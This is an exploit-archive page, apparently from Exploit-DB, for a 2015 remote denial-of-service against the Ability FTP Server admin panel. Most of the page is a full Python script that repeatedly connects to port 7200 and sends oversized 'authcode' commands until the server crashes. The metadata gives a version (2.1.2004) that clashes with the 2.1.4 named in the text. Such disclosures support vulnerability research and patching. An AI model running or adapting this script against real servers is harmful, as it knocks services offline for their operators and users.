Ability FTP Server Admin Panel AUTHCODE Command Remote Dos

vendor:

Ability FTP Server

by:

St0rn

7.5

CVSS

HIGH

Remote Denial of Service

400

CWE

Product Name: Ability FTP Server

Affected Version From: 2.1.2004

Affected Version To: 2.1.2004

Patch Exists: YES

Related CWE: N/A

CPE: a:codecrafters:ability_ftp_server

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7

2015

Ability FTP Server Admin Panel AUTHCODE Command Remote Dos

This exploit is used to crash the Ability FTP Server Admin Panel by sending a large number of 'authcode' commands to the server. This exploit was discovered by St0rn in 2015 and affects version 2.1.4 of the Ability FTP Server.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to update the server to the latest version.

Source

Exploit-DB raw data:

#!/usr/bin/env python
#
# Exploit Title: Ability FTP Server Admin Panel AUTHCODE Command Remote Dos
# Date: 2015-08-15
# Exploit Author: St0rn <st0rn[at]anbu-pentest[dot]com>
# Twitter: st0rnpentest
#
# Vendor Homepage: www.codecrafters.com
# Software Link: http://www.codecrafters.com/AbilityFTPServer
# Version: 2.1.4
# Tested on: Windows 7
#

import socket
import sys
import os


def clear():
 os.system("cls")

def banner():
 print "############################################".center(80)
 print "#  Ability FTP Server Admin panel DoS       #".center(80)
 print "#             Author: St0rn                #".center(80)
 print "#      <fabien[at]anbu-pentest[dot]com>    #".center(80)
 print "############################################".center(80)
   
def createconn(ip):
 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
 try:
  s.connect((ip,7200))
 except:
  print "\n"
  print "[+] Server Down!".center(80)
  sys.exit(0)
 return s

def crash(sock):
 try:
  while 1:
   sock.send('authcode '+'a'*99999)
   sys.stdout.write('.')
 except:
  sock.close()

############### Main ###############
clear()
banner()

if len(sys.argv)==2:
 print "\n"
 print "Waiting before crash".center(80)
 print "(The server can be run without afsloader.exe)".center(80)
 while 1:
  s=createconn(sys.argv[1])
  crash(s)
else:
 print "\n"
 print "Usage: AftpAdminDos.py [Server IP]".center(80)
 sys.exit(0)